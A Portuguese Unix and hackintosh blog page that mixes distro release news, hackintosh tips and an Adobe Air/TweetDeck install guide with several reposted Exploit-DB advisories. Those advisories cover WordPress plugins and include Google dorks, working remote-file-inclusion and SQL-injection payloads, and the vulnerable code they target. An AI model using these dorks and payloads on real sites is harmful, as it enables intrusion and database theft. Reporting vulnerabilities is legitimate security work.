AppUnix Um portal sobre Unix-Like Sem igual

WordPress Relocate Upload Plugin 0.14 Remote File Inclusion

23/09/2011 por little_oak

# Exploit Title: Relocate Upload WordPress plugin RFI # Google Dork: inurl:wp-content/plugins/relocate-upload # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/ # Version: 0.14 (tested)

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI

--- Vulnerable Code --- // Move folder request handled when called by GET AJAX if (isset($_GET['ru_folder'])) { // WP setup and function access define('db_unx_USE_THEMES', false); require_once(urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter

Fonte: http://www.exploit-db.com/exploits/17869/

WordPress Mini Mail Dashboard Widget Plugin 1.36 Remote File Inclusion

23/09/2011 por little_oak

# Exploit Title: Mini Mail Dashboard Widget WordPress plugin RFI # Google Dork: inurl:wp-content/plugins/mini-mail-dashboard-widget # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/mini-mail-dashboard-widget/download/ # Version: 1.36 (tested)

—
PoC
—
http://SERVER/db_unx_PATH/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=RFI (requires POSTing a file with ID wpmm-upload for this to work)

—
Vulnerable Code
—
if (isset($_FILES[‘wpmm-upload’])) {
// Create WordPress environmnt
require_once(urldecode($_REQUEST[‘abspath’]) . ‘wp-load.php’);

// Handle attachment
WPMiniMail::wpmm_upload();
}

Fonte: http://www.exploit-db.com/exploits/17868/

P5KPL-AM SE updates no lion 10.7.1 current ocorreram muito bem no hackintosh

21/09/2011 por little_oak

Boa noite grandes mestres, só estamos postando esta informação extra para deixar o coração dos amantes de hackintosh mais tranquilizados.
Fizemos, neste instante todas as updates disponíveis pela apple na arquitetura 10.7.1 (current) em cima do seguinte hardware:

Cpu – 2160 (intel dual core),

2 gb de ram ddr 800,

VGA nvidia 8500gt,

P5KPL-AM SE (placa-mãe).

O máximo de erro que você poderá encontrar (após reboot) é o do print a seguir:

Basta apenas reiniciar seu hackintosh e o problema será sanado (provavelmente permissões).

Se você usa hackintosh pode fazer todas as updates possíveis até o dia 20/09/2011, tudo filé.

Qualquer dúvida ou sugestão reportem-nos.

Abraços.

Itens básicos para entrar no mundo Hackintosh

19/09/2011 por Shell

Olá galera… tudo na paz?

Vixe, muito tempo sem escrever aqui galera….. Mas é por uma nobre causa….. tenho me esforçado ao máximo para adquirir conhecimentos que facilitem as explicações e melhorem os artigos a vocês nossos leitores….. hoje eu queria esclarecer alguns aspectos que considero fundamentais ao entusiastas ao mundo hackintosh…..

Não quero ser chato, muito menos egoista… mas há certas coisas que são indispensáveis a se saber quando se quer mexer com algo tão complexo… (Hackintosh)

Ex:

1 – Saber ao menos o básico sobre hardware (ou ao menos saber onde procurar)

2 – Configurações básicas e avançadas de BIOS

3 – Noções básicas de sistemas Linux (é dispensável, mas isso facilita muito o entendimento de comandos e dos sistema de diretórios do Mac OS)

4 – O principal de tudo, força de vontade e saber bons lugares para se procurar gente que queira lhe ajudar

Está parecendo anuncio de vaga de emprego, hauhauahuah mas não é….. são apenas aspectos básicos e que acho essenciais ao Hackitnosher

Alguns sites com informação de responsa:

https://www.appunix.com.br

http://www.hmbt.org

http://www.hackintosh.com

http://blog.nawcom.com/

http://www/hackintosh.org

http://www.lifehacker.com

http://tonymacx86.blogspot.com/

http://www.tomshardware.com/

http://forum.voodooprojects.org/

http://www.kexts.com

http://wiki.osx86project.org/wiki/index.php/Main_Page

http://www.insanelymac.com/

Não necessariamente nessa ordem, esse são sites onde seus membros escrevem materiais de responsa sobre Mac OS X, Hackintosh…. inclusive desenvolvem ferramentas que facilitam a vida de NÓS entusiastas do mundo Hackintosh…… o principal desse post é dizer que não adianta o cara querer entrar no mundo Hackintosh sem saber ao menos como dar boot via cd ou pendrive…. fica impossível galera, não dá pra dar suporte ou ao menos ajudar pessoas que não sabem o mínimo de informática…. Sinceramente não sei como serei interpretado ao escrever esse artigo mas, espero que não me entendam mal, mas quero apenas que facilitem minha vida ao lhes ajudar e a suas ao serem ajudados….. Aprendi muito com a cominidade Linux e principalmente com a comunidade Hackintosh…. Todos querem ajudar mas não somos curso de informática….. não estamos aqui para ensinar informática, vamos ajudar a resolver qualquer tipo de problema (ou aos menos vamos nos esforçar bastante para isso)… mas nos procurar sem saber ao menos com se entra na BIOS de um PC, isso é muito constrangedor…. Eu pelo menos não consigo maltratar ninguém…. nem ao menos negar ajuda, mas se vocês já frequentaram outros fóruns por ai, devem perceber que existem moderadores e/ou usuários mais avançados que fazem esses inesperientes usuários perderem a vontade de entrar/continuar nesse mundo do Hackitnosh….. Resolvi a alguns dias conversando com meu grande amigo Little_Oak que vamos tornar o AppUnix um portal com conteúdo para todo tipo de usuário Hackintosh…. desde o cara que não sabe absolutamente nada, até o usuário Mac/Hackintosh experiente que precisa resolver um problema em seu Mac ou Hackitnosh e não sabe onde encontrar a resposta….. Eu particularmente acho que antes de entrar nesse mundo hackintosh todos NÓS deveriamos conhecer as maravilhas do mundo Linux….. Eu, Doooguinha comecei a mexer a ser um entusiasta no Mundo Mac (diga-se Hackitnosh) um pouco antes de começar no Mundo Linux…. até que surgiu a vontade/necessidade de me diferenciar dos amigos sysadmins de plantão…… Grande maioria de nossos amigos sysadmins somente conhecem Window$…. Infelizmente é assim….. Hoje tenho mais ou menos 3 anos que sou usuários Linux… administro Redes mistas, e o conhecimento que o mundo Linux me trouxe foi um dos pontos principais à minha adaptação tão rápida aos conceitos do mundo Hackintosh…. ficou tudo muito mais claro do que quando eu não conhecia nada de Linux…. não sou expert em Linux nem em Mac OS… mas me viro bem em qualquer dos ambientes…. pretendo no final do ano tirar minha primeira Certificação Linux (LPI nível 1) e no próximo ano tirar LPI nível 2….. Costumo dizer que “Uso Mac OS, estudo Linux e respeito windows (por ter uma gangue muito grande e poder querer juntar sua turminha e me pegar na rua)“ …

Nos ajudem leitores, vamos fazer desse portal um referencial aos que querem entrar nesse mundo de hackitnosh, estou completamente comprometido em deixar isso aqui ideal aos que não tem experiência alguma nessa área… A indicação de how tos/dúvidas por meio de vocês leitores será importantíssima para que nosso BLOG vire um ponto de encontro entre usuários de todos os níveis do mundo hackintosh…. contamos de verdade com a colaboração de vocês.

Gostou? Comente, complemente e espalhe!

Obrigado a todos….

Lançado FreeBSD 9.0-BETA2

15/09/2011 por little_oak

Ken Smith has announced the availability of the second beta of FreeBSD 9.0, more than a month later than planned: “The second beta build of the 9.0-RELEASE release cycle is now available. Note: the location of the FTP install tree and ISOs have changed slightly. What we used for BETA2 reflects a directory structure that would let us fully utilize building and distributing a wider variety of architectures. The new layout does add some extra complexity, so we’re actively discussing whether or not to change the layout from previous releases, and if we do change it whether or not to change it this much. What’s there now can be viewed as an almost ‘worst-case’ scenario. It’s entirely possible we’ll back off and revert to the old layout despite that layout potentially limiting.” There is much more information in the release announcement, including notes on what to test. Download links for the i386 and amd64 ISO images: FreeBSD-9.0-BETA2-i386-dvd1.iso (498MB, SHA256), FreeBSD-9.0-BETA2-amd64-dvd1.iso (607MB, SHA256).

Fonte: http://distrowatch.com/6875

Como instalar Adobe Air mais recente + TweetDeck no Mac Os X Lion

07/09/2011 por little_oak

É bem verdade que com os recursos do Flex dá para ser feito um monte de coisas bacanas. Muitos já devem conhecer a ferramenta TweetDeck (a qual já até citamos em outro post, porém para Android, caso queira companhar basta clicar no top 2011 aplicativos para android). Neste post iremos mostrar como instalar de forma ultra blaster simples o Adobe Air e em seguida como instalar o TweetDeck. Os passos são simples e foram feitos literalmente em um sistema operacional Mac Os X Lion.

Como instalar Adobe Air no Mac Os X?

Vamos lá!

Primeiro passo que devemos fazer é acessar o site da adobe para baixar o pacote oficial direto do site. Usamos uma simples tática, entrando no site da Google e colocando Download Adobe Air. O Site em si, assim que clicado pela url fornecida ao google já checa os cabeçalhos e de cara lhe redireciona para o Link de download para Osx, ou seja, arquivo de download vem no formato DMG.

Se você quiser o Link que usamos (talvez, daqui alguns dias, com os próximos releases este já poderá não estar mais acessível. Caso ainda assim queira:

http://get.adobe.com/br/air/thankyou/?installer=Adobe_AIR_2.7.1_for_MacOS_X

Veja que estamos mostrando literalmente como fizemos via texto ou por imagem (há quem afirme que uma imagem fala mais que mil palavras :P ).

Perceba que clicando no link da adobe de download ele cai na página acima. Quando clicamos em download o redirecionamento vai para o link que citamos que pode perder sua validade (ele se basea no versionamento e não no nome canonical de download adobe air for mac, por exemplo).

Esta parte já começa a fircar interessante. Como podem perceber estamos baixando o Adobe Air em formato DMG para o disco.

Confirmando a execução do adobe air install

Agora iremos confirmar a instalação do Adobe Air.

Devemos dizer que iremos abrir o arquivo baixado.

Ideal mesmo é que abramos a pasta aonde ele foi salvo no download e cliquemos em cima do arquivo dmg para rodar logo o instalador.

Veja que ao abrir o dmg ele mostra literalmente o instalador do adobe air, devemos prosseguir clicando duas vezes sobre este arquivo vermelhinho para o instalador começar a rodar.

Confirmando a execução do arquivo web adobe air install

Confirmando a execução iremos para a tela a seguir:

Veja que no meu caso havia uma versão bem ultrapassada do adobe air instalada, nesta hora ele pede confirmação para ATUALIZAR, se este for seu caso, basta seguir, do contrário, se não havia adobe air ele sugere instalar. No passo da aceitação ele segue literalmente padronizado, dizendo instalar ou atualizar o resto é idêntico. Devemos confirmar aceitando a instalação/atualização.

Autorize a instalação com seu login e senha mestra

Autorizando com nosso usuário e senha iremos prosseguir com a instalação.

Progresso da instalação do adobe air no mac os x lion

Veja acima o progresso da instalação ocorrendo tranquilamente.

Agora finalizamos a instalação do adobe air.

Como instalar o TweetDeck?

Vamos lá!

Agora iremos instalar o TweetDeck de forma tranquila.

A forma mais eficaz é fazer igual fizemos acima. Acessando o GOOGLE e escrevendo TweetDeck automaticamente temos o site oficial.

Caso queira acessar direto não perca tempo :P, clique aqui -> http://www.tweetdeck.com/desktop/

Se clicar no link acima já caímos na parte que nos interessa, do contrário acessaremos o site do tweetdeck e teremos de clicar em desktop, veja as 2 fotos:

Veja que o tweetdeck é uma ferramenta oficial do Twitter, por isso tranquilizesse quanto ao seu uso. (milhares de users aprovam :P )
Clicando no link de download do site iremos instalar tranquilamente o TweetDeck, veja a imagem abaixo:

Clicando em Download now ele automaticamente utiliza recursos do adobe air instalado em seu desktop. Assim que chamamos clicando ele automaticamente prepara o download e instalação, veja:

Preparando a instalação do TweetDeck 2011

Vamos dando prosseguimento:

Agora iremos prosseguir novamente. Confirme a instalação avançando mais esta etapa acima.

Os passos acima confirmam o download do tweetdeck via adobe air. Agora iremos finalizar a instalação do mesmo seguindo as imagens abaixo:

Vamos encerrar isso ou não? Veja os passos abaixo:

Pronto. Assim que concluir ele já vai pedir para autorizar o Tweetdeck pois foi baixado da internet (confirme imagem abaixo):

Pronto.

Veja aonde o danado fica no menu:

Gostou? Salvou seu dia? Então comente este artigo!

Achou massa? Compartilhe!

Se não gostou também critique.

Atenciosamente

4PPUN1X (l4b m41s p1r4d0 de T1).

openSUSE 12.1 Milestone 5 Lançado

06/09/2011 por little_oak

Bryen Yunashko has announced the availability of the third milestone release of openSUSE 12.1: “openSUSE 12.1’s milestone 5 is now ready for download. Here are some interesting things you can expect to see when you try milestone 5: further changes have been made to systemd which replaces the SysInitV system, the default is still SysInitV but we encourage testing of systemd so that we can switch the default for the next release; we are focusing on the GPL-ed OpenJDK version now, this milestone is the last one that comes with the binary Java provided by Oracle; GNOME 3.1.5 is another step closer to GNOME 3.2; glibc has been updated to version 2.14.” For more details please see the full release announcement. Download (mirrors): openSUSE-KDE-LiveCD-Build0250-i686.iso (696MB, MD5, torrent), openSUSE-GNOME-LiveCD-Build0250-i686.iso (664MB, MD5, torrent), openSUSE-KDE-LiveCD-Build0250-x86_64.iso (689MB, MD5, torrent), openSUSE-GNOME-LiveCD-Build0250-x86_64.iso (678MB, MD5, torrent).

Fonte: http://distrowatch.com/6869

WordPress PureHTML plugin <= 1.0.0 SQL Injection

11/12/2015 por little_oak

# Exploit Title: WordPress PureHTML plugin < = 1.0.0 SQL Injection Vulnerability # Date: 2011-08-31 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/pure-html.1.0.0.zip # Version: 1.0.0 (tested) # Note: magic_quotes has to be turned off --------------- PoC (POST data) --------------- http://www.site.com/wp-content/plugins/pure-html/alter.php PureHTMLNOnce=1&action=delete&id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

—————
Vulnerable code
—————
if(!isset($_POST[‘PureHTMLNOnce’])){
if ( !db_unx_verify_nonce( $_POST[‘PureHTMLNOnce’], plugin_basename(__FILE__) )) {header(“location:”.$refer);}
}
else{
…
if(isset($_POST[‘id’])){$id = $_POST[‘id’];}else{$id=’0′;}
…
$action = $_POST[‘action’];

#delete
if($action == “delete”){
$sql = “delete from “.$wpdb->prefix.”pureHTML_functions WHERE id='”.$id.”‘”;
$wpdb->query($wpdb->prepare($sql)); //misusage of $wpdb->prepare() :)

Fonte: http://www.exploit-db.com/exploits/17758/

WordPress yolink Search plugin <= 1.1.4 SQL Injection

06/09/2011 por little_oak

# Exploit Title: WordPress yolink Search plugin < = 1.1.4 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/yolink-search.1.1.4.zip # Version: 1.1.4 (tested) --------------- PoC (POST data) --------------- http://www.site.com/wp-content/plugins/yolink-search/includes/bulkcrawl.php page=-1&from_id=-1 UNION ALL SELECT CONCAT_WS(CHAR(58),database(),version(),current_user()),NULL--%20&batch_size=-1 --------------- Vulnerable code --------------- $post_type_in = array(); if( isset( $_POST['page'] ) ) { $post_type_in[] = '"page"'; } if( isset( $_POST['post'] ) ) { $post_type_in[] = '"post"'; } $post_type_in = '(' . implode(',', $post_type_in) . ')'; $id_from = $_POST['from_id']; $batch_size = $_POST['batch_size']; $post_recs = $wpdb->get_results( $wpdb->prepare( "SELECT ID,GUID FROM $wpdb->posts WHERE post_status='publish' AND post_type IN $post_type_in AND ID > $id_from order by ID asc LIMIT $batch_size" ) ); //misusage of $wpdb->prepare() :)

Fonte: http://www.exploit-db.com/exploits/17757/

WordPress wp audio gallery playlist plugin <= 0.12 SQL Injection

06/09/2011 por little_oak

# Exploit Title: WordPress wp audio gallery playlist plugin < = 0.12 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/wp-audio-gallery-playlist.0.12.zip # Version: 0.12 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/wp-audio-gallery-playlist/playlist.php?post_gallery=-1' UNION ALL SELECT 1,2,3,4,5,database(),current_user(),8,9,10,11,12,13,14,15,16,17,18,version(),20,21,22,23--%20 --------------- Vulnerable code --------------- $table_name = $wpdb->prefix . "posts"; ... if (isset($_GET['post_gallery'])) $query = 'SELECT * FROM '.$table_name.' WHERE post_parent = \''.$_GET['post_gallery'].'\' AND post_mime_type = \'audio/mpeg\' ORDER BY menu_order ASC';

Fonte: http://www.exploit-db.com/exploits/17756/